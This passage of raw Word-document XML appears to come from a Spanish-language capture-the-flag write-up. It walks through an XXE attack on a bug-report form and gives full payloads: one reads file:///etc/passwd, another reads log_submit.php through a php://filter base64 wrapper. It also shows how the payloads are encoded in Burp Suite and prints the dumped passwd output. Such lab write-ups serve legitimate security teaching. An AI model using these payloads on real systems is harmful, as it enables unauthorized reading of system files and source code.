          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC465C8" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D836C7A" w14:textId="78818C69" w:rsidR="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;reward&gt;test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863492F" w14:textId="1147772C" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:r w:rsidRPr="000C007C">
        <w:t xml:space="preserve">Donde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:t xml:space="preserve"> ser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">á </w:t>
      </w:r>
      <w:r w:rsidR="00C0138E">
        <w:t>la variable para imprimir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el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</w:p>
    <w:p w14:paraId="7B346693" w14:textId="220CC8CC" w:rsidR="001D0525" w:rsidRDefault="00087C7E" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Ahora todo eso lo vamos a mandar como base64. Para este proceso lo puedes hacer desde un editor como también desde la plataforma de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite. En este caso utilizaremos el segundo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B5DEC" w14:textId="68AD218A" w:rsidR="00087C7E" w:rsidRDefault="00087C7E" w:rsidP="00FA6809">
      <w:r w:rsidRPr="00087C7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54EC97B4" wp14:editId="17C6CD7A">
            <wp:extent cx="5669280" cy="683994"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="65123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32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7222" cy="68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9A84" w14:textId="77777777" w:rsidR="00087C7E" w:rsidRDefault="00087C7E" w:rsidP="00FA6809"/>
    <w:p w14:paraId="50FDFF1A" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C18AA1" w14:textId="0FF54FAB" w:rsidR="00087C7E" w:rsidRDefault="00087C7E" w:rsidP="00FA6809">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Copiamos toda esa cadena y lo pegamos en la data. Finalmente presionamos CTRL+U para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodearlo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Y este sería el resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EC8961" w14:textId="2ABF4A0B" w:rsidR="002952EF" w:rsidRDefault="002952EF" w:rsidP="002952EF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002952EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07885EFE" wp14:editId="71F59773">
            <wp:extent cx="4882633" cy="3115376"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="10903314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31430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9731" cy="31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52F0" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082E92F5" w14:textId="3B307A30" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/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bin:x:2:2:bin:/bin:/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sys:x:3:3:sys:/dev:/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sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/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/games:/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man:x:6:12:man:/var/cache/man:/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lp:x:7:7:lp:/var/spool/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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mail:x:8:8:mail:/var/mail:/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news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uucp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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proxy:x:13:13:proxy:/bin:/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www-data:x:33:33:www-data:/var/www:/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backup:x:34:34:backup:/var/backups:/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br/>
        <w:t>pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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systemd-coredump:x:999:999:systemd Core Dumper:/:/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  <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>development:x:1000:1000:Development:/home/development:/bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lxd:x:998:100::/var/snap/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/bin/false usbmux:x:112:46:usbmux daemon,,,:/var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usbmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="552B1FB5" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRPr="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C5B4CC" w14:textId="5E4AD27A" w:rsidR="006F6DC0" w:rsidRPr="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:r w:rsidRPr="006F6DC0">
        <w:t xml:space="preserve">Tenemos el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:t>development</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ara poder acceder desde una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F6DC0">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBBF046" w14:textId="3A9719CE" w:rsidR="002952EF" w:rsidRDefault="004B0955" w:rsidP="00FA6809">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y en efecto, podemos visualizar el contenido de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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C71CB8" w14:textId="0F2BE260" w:rsidR="00173B51" w:rsidRDefault="00173B51" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Adicionalmente, observamos que en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> está haciendo mención </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> un archivo llamado </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_submit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Entonces a nivel de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> trataremos de leer el documento de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE728F" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml  version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDDCC3C" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"file:///etc/passwd"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF11666" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF549F5" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622FC12" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572CFDA1" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF2D4B" w14:textId="740AE114" w:rsidR="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;reward&gt;test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A477A73" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA1A51B" w14:textId="517BC511" w:rsidR="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:r w:rsidRPr="00173B51">
        <w:t>Lo que está resaltado en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> amarillo es </w:t>
      </w:r>
      <w:r w:rsidR="00D41F0F">
        <w:t xml:space="preserve">lo que vamos a cambiarlo por: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACAB8F" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml  version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E7D61" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"php://filter/read=convert.base64-encode/resource=log_submit.php"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CCE1A" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B8972" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0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&lt;title&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4B7A1" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF54D77" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00D64B" w14:textId="6FA9ADFC" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0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&lt;reward&gt;test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C557534" w14:textId="6157176D" w:rsidR="00173B51" w:rsidRDefault="00577C2D" w:rsidP="00173B51">
      <w:r w:rsidRPr="00577C2D">
        <w:t xml:space="preserve">Y </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">toda esa cadena lo mandamos como base64 en la variable data (tiene que estar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodeado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AC9685" w14:textId="683C9CE9" w:rsidR="00577C2D" w:rsidRDefault="00577C2D" w:rsidP="00577C2D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00577C2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="785C7234" wp14:editId="28E854B9">
            <wp:extent cx="4668959" cy="2664995"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="9031148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14842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4631" cy="266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EAA2" w14:textId="3238DDCF" w:rsidR="00577C2D" w:rsidRDefault="007659EE" w:rsidP="00173B51">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Si copiamos la cadena que está devolviendo en el response como base64 -d el resultado es el siguiente:</w:t>
      </w:r>
    </w:p>
